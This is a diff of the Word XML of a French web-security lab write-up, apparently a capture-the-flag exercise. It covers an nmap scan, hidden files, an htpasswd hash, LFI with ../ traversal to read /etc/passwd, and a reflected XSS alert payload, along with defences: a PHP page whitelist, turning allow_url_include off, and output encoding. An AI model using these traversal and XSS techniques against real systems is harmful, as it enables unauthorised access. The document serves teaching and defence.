                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId38"/>
+                    <a:blip r:embed="rId42"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4196,7 +4290,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId39"/>
+                    <a:blip r:embed="rId43"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4270,7 +4364,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId40"/>
+                    <a:blip r:embed="rId44"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4721,7 +4815,7 @@
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId41"/>
+      <w:footerReference w:type="default" r:id="rId45"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
       <w:cols w:space="708"/>
@@ -7672,6 +7766,7 @@
   <w:style w:type="character" w:default="1" w:styleId="Policepardfaut">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableauNormal">

--- a/LAB WebEX.docx
+++ b/LAB WebEX.docx
@@ -21,20 +21,8 @@
           <w:sz w:val="40"/>
           <w:szCs w:val="40"/>
         </w:rPr>
-        <w:t xml:space="preserve">LAB </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
-        </w:rPr>
-        <w:t>WebEX</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>LAB WebEX</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -538,21 +526,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t xml:space="preserve">Après avoir </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>installer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">Après avoir installer </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -560,19 +534,11 @@
         </w:rPr>
         <w:t xml:space="preserve">l’image </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>Dark.ISO</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> et récupérer l’adresse IP du serveur</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>Dark.ISO et récupérer l’adresse IP du serveur</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -771,61 +737,13 @@
           <w:color w:val="92D050"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="92D050"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>sC</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>sV</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.10.22</w:t>
+        <w:t>nmap -sC -sV 192.168.10.22</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -901,25 +819,13 @@
           <w:color w:val="92D050"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="92D050"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>curl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -I </w:t>
+        <w:t xml:space="preserve">curl -I </w:t>
       </w:r>
       <w:hyperlink r:id="rId11" w:history="1">
         <w:r>
@@ -1073,7 +979,6 @@
           <w:color w:val="275317" w:themeColor="accent6" w:themeShade="80"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -1081,47 +986,21 @@
           <w:bCs/>
           <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
         </w:rPr>
-        <w:t>d</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
-        </w:rPr>
-        <w:t>19b4823e0d5600ceed56d5e896ef328d7a2b9e7ac7e80f4fcdb9b10bcb3e7ff</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>robots</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>_and_hidden_files</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>d19b4823e0d5600ceed56d5e896ef328d7a2b9e7ac7e80f4fcdb9b10bcb3e7ff</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">robots_and_hidden_files </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1250,35 +1129,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t xml:space="preserve">Dans le fichier </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>htpasswd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> on récupère </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>ce</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> hash : </w:t>
+        <w:t xml:space="preserve">Dans le fichier htpasswd on récupère ce hash : </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1623,21 +1474,7 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Les séquences</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ..</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve">/ permettent de remonter des répertoires. </w:t>
+        <w:t xml:space="preserve">Les séquences ../ permettent de remonter des répertoires. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1654,35 +1491,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t>Le fichier /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>passwd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> est ciblé car il est lisible par tous les utilisateurs et confirme que l'on peut accéder au système des fichiers.</w:t>
+        <w:t>Le fichier /etc/passwd est ciblé car il est lisible par tous les utilisateurs et confirme que l'on peut accéder au système des fichiers.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1859,35 +1668,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t>La faille LFI permet à un attaquant de manipuler le paramètre ?page= pour lire des fichiers système comme /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>passwd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>La faille LFI permet à un attaquant de manipuler le paramètre ?page= pour lire des fichiers système comme /etc/passwd.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1954,61 +1735,7 @@
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>allowed_pages</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = ['home', '</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>survey</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>', '</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>member</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>', 'feedback', 'media'];</w:t>
+        <w:t>$allowed_pages = ['home', 'survey', 'member', 'feedback', 'media'];</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2057,59 +1784,13 @@
           <w:highlight w:val="black"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>if</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>in_array</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>($page, $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>allowed_pages</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>)) {</w:t>
+        <w:t>if (in_array($page, $allowed_pages)) {</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2130,45 +1811,7 @@
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>include</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> "pages/" . $page . ".</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>";</w:t>
+        <w:t xml:space="preserve">    include "pages/" . $page . ".php";</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2189,25 +1832,7 @@
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t xml:space="preserve">} </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>else</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> {</w:t>
+        <w:t>} else {</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2228,27 +1853,7 @@
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>include</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> "pages/404.php";</w:t>
+        <w:t xml:space="preserve">    include "pages/404.php";</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2302,21 +1907,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t xml:space="preserve">Désactivation des fonctions dangereuses : Dans le fichier php.ini, il est conseillé de passer </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>allow_url_include</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> à Off pour empêcher les inclusions de fichiers distants (RFI).</w:t>
+        <w:t>Désactivation des fonctions dangereuses : Dans le fichier php.ini, il est conseillé de passer allow_url_include à Off pour empêcher les inclusions de fichiers distants (RFI).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2385,7 +1976,6 @@
         </w:rPr>
         <w:t>-</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2404,7 +1994,6 @@
         </w:rPr>
         <w:t>d</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2443,6 +2032,17 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="275317" w:themeColor="accent6" w:themeShade="80"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2472,6 +2072,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Hack (trouvé dans la base de données)</w:t>
       </w:r>
       <w:r>
@@ -2513,43 +2114,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>script</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>alert</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>('XSS')&lt;/script&gt;</w:t>
+        <w:t>&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2658,15 +2223,26 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
         <w:t>FAILLE</w:t>
       </w:r>
       <w:r>
@@ -2696,7 +2272,6 @@
         </w:rPr>
         <w:t>-</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2704,9 +2279,8 @@
           <w:bCs/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
-        <w:t>Reflected</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Reflected (Media</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2714,15 +2288,6 @@
           <w:bCs/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (Media</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
         <w:t>)</w:t>
       </w:r>
     </w:p>
@@ -2751,6 +2316,17 @@
         <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
       </w:pPr>
@@ -2759,31 +2335,69 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
-        <w:t>Il convient d’encoder &lt;script&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">Il convient d’encoder </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
